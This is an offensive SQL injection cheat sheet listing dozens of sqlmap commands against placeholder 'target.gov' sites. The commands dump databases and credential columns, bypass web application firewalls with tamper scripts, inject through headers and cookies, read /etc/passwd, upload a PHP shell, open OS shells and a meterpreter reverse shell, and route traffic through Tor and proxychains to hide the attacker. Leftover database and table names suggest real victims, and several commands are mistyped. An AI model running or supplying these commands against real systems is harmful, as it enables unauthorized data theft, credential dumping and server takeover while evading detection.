SqlMap Cheat Sheet

SQLmap Special Command

1. BASIC COMMAND SQLMAP

- sqlmap -u "target.gov" --dbs --batch

- sqlmap -u "target.gov" -D ( name database ) --columns --batch

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) --columns --batch 

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) -C ( name column ) --dump --batch

2. WAF BYPASS TYPE

all bypass waf forbidden

- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 

waf bypass using tamper script

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch
 
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov" --level=5 --skip-waf --dbs --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs --batch

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs --batch

- sqlmap -u "target.gov" -v3 --technique=T --no-cast --fresh-queries --banner --dbs --batch

- sqlmap -u "target.gov" --level 2 --risk 3 --batch --dbs

- sqlmap -u "target.gov" -f -b --current-user --current-db --is-dba --users --dbs --batch

- sqlmap -u "target.gov" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --batch

- sqlmap -u "target.gov" --risk 3 --level 5 --random-agent --proxy http://127.0.0.1:5980 --dbs --batch

- sqlmap -u "target.gov" --random-agent --dbms=MYSQL --dbs --technique=B" --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch

- sqlmap -u "target.gov" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --batch

- sqlmap -u "target.gov" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump --batch

- sqlmap -u "target.gov" --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --

tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --batch

- sqlmap -u "target.gov" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

- sqlmap -u "target.gov" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --batch

- sqlmap -u "target.gov" -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --columns --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -batch

- sqlmap -u "target.gov" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --batch

- sqlmap -u "target.gov:80/search.cmd?form_state=1" –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --batch

-sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump --batch

- sqlmap -u "target.gov" tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql --batcH                                                                                               

bypass 403 forbidden

- sqlmap -u "target.gov" -v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent --batch --dbs --no-cast --batch 

bypass 403 Not Acceptable

- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 --batch 

bypass 500 internal server error

--sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned -v 3 --batch 

bypass waf dump table 500 internal server error

- sqlmap -u "target.gov"  --dbs --tamper=modsecurityzeroversioned,multiplespaces.py -v 3 --batch 

bypass waf Mod Security

- sqlmap -u "target.gov" --random-agent --tamper=modsecurityversioned --level=3 --risk=3 -v 3 --dbs --batcH

3. SPECIAL COMMAND

upload on header PUT

- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

retrieve information

- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --batch

tajuk refferer

- sqlmap -u "target.gov" --headers="referer:*" --batch

header injection to combination sql

- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch

injection in header and other HTTP method

> inside cookie 
- sqlmap  -u "target.gov" --cookie "mycookies=*" --batch

> inside some HEADER
- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch
- sqlmap -u "target.gov" --headers="referer:*" --batch

> PUT method
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

Verbose

- sqlmap -u "target.gov" -v 3 --batch

indicate string when injection is successfully

- sqlmap -u "target.gov" --string="string_showed_when_TRUE" 

scanning form

- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch

force ssl/https

- sqlmap -r a.req --force-ssl --users --batch

specifiy parameter save request file

- sqlmap -r login.req -p Password --dbms=mssql -v 3  --batch --level 5 --risk 3 --batch

costumizing injection

> set a suffix injection
- sqlmap -u "target.gov/?id=1"  -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1"  -p id --prefix="') " --batch

second order injection

- sqlmap -r /tmp/r.txt --dbms MySQL --second-order "target.gov" -v 3 --batch
- sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs --batch
- sqlmap -r /root/Desktop/Burp.txt –second -order “target.gov” --batch

running query sql

- sqlmap -u nz3666ghost.to/cat.php?id=2 –sql-shell --batch

scanning page authentication HTTP ( Baci,NTLM,Digest )

- sqlmap -u http://example.com/admin.aspx –auth-type Basic –auth-cred “admin: admin” --batch

scanning page key basic

- sqlmap -u http://example.com/admin.aspx - auth-file = < certificate PEM or Private key > --batch

use network anonim TOR vpn

- sqlmap -u "target.gov/admin.aspx" –tor --batch
> set port tor
- sqlmap -u "target.gov/admin/aspx" –tor-port = <tor proxy port> --batch

request delay HTTP

- sqlmap -u "target.gov/admin.aspx" –delay = delay 1 # 1 second --batch

protection page of token CSRF ( Crossite Request Forgery )

- sqlmap -u "target.gov/admin.aspx" –csrf-token = <csrf token> --batch

finding boolean injection

- sqlmap -r r.txt -p id --not-string ridiculous --batch

request injection

- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch

injection from file

- sqlmap -r request.txt --batch

testing with pattern URL’s

- sqlmap -u "target.gov/page/*/view" --dbs --batch

using cookies

- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs --batch

identify current database

- sqlmap -u "target.gov/page.php?id=1" --current-db --batch

multi threading

- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch

null connection

- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch

HTTP persistant connection

- sqlmap -u "target.gov/page.php?id=1" --dbs --keep-alive --batch

output prediction

- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump --predict-output --batch

checking privilages

- sqlmap -u "target.gov/page.php?id=1" --privileges --batch

reading file from server

- sqlmap -u "target.gov/page.php?id=1" --file-read=/etc/passwd --batch

using proxxy

- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch

using proxxy with credentials

- sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u "target.gov/page.php?id=1" --batch

4. CRAWLING INJECTION

- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch

- sqlmap -u "target.gov" --crawal=10 --forms --dbs --batch

- sqlmap -u "target.gov" --crawl=2 --forms --dbs --batch

- sqlmap --threads 10 --batch --crawl 1 --forms -u "target.gov" --tamper space2comment --dbs --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

- sqlmap -u "target.gov" –crawl = 3 –cookie = "" –crawl-exclude = "logout" --batch

- sqlmap -u "target.gov" --dbms=mysql --crawl=3 --batch

- sqlmap -u "<targetip>" --forms --batch --crawl=10 --cookie=jsessionid=54321 --level 4 --risk 3 --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

5. SQL POST DATA

- sqlmap -u "target.gov" --data="email=omest&password=omest" --method POST --dbs --batch

6. PARAMETER INJECTION

- sqlmap -u "target.gov" --banner --dbs --batch

7. BURPSUITE/SANDROPROXXY > SQLMAP

> POST request
- sqlmap -r target.txt -p username --batch 
- sqlmap -r target.txt -p username --dump --batch

> capture request and create req.txt file
- sqlmap -r req.txt --current-user --batch

> GET request injection
- sqlmap -u "target.gov" -p id --batch
- sqlmap -u "http://example.com/?id=*" -p id --batch

> POST request injection
- sqlmap -u "target.gov" --data "username=*&password=*" --dbs --batch

8. SQLMAP OS SHELL

> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch  

> basic operating system command prompt ( Windows )
- sqlmap -u "target.gov/leet.php?id=1337" --os-cmd ( command windows ) --batch 

> simple shell
- sqlmap  -u "target.gov/?id=1" -p id --os-shell --batch 
 
> exec command os windows
- sqlmap -u "target.gov/?id=1" -p id --os-cmd whoami
 
> dropping reverse shell ( meterpreter )
- sqlmap -u "target.gov/?id=1" -p id --os-pwn --batch
--file-read=/etc/passwd ( read file )

> os uploading shell 
- sqlmap -u "target.gov/page.php?id=1" --file-write=path/shell.php --file-dest=path/shell.php --batch

> os write commad
- sqlmap -u "target.gov/page.php?id=1" --os-shell --batch
after successfully get OS shell
write some file, example 
echo "leet" >> haxor.txt

> os shell cookies injection and skipping waf 
- sqlmap -u "target.gov/pussy.php?cat=123" --threads=10 --cookie="cookies" --skip-waf --os-shell --batch

9. SQLMAP WITH PROXYCHAINS ( TOR )

> update and upgrade
- sudo apt-get update;sudo apt-get upgrade

> install proxychains & tor
- sudo apt-get purge proxychains;sudo apt-get purge  proxychains4;sudo apt-get purge tor
- sudo apt-get install proxychains4;sudo apt-get install proxychains;sudo apt-get install tor
- which proxychains;which proxychains4;which tor

> setting configuration proxychains using text editor terminal like nano,vim,micro  and etc
- micro /etc/proxychains.conf
WARNING !
listen 
delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in strict_chain one more and delete hastag coment ( # ) in random_chain

add socks5 below socks4
example
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050 ( here add new socks with socks5 like this )


fix line in hastag coment # proxylist format, example you just space line so that it is parallel
and then save file configuration

- start tor with command sudo service tor start
- check status tor active with command sudo service tor status


and last run sqlmap tool with proxychains

yp@syntax:~# proxychains sqlmap -u "target.gov" --dbs --batch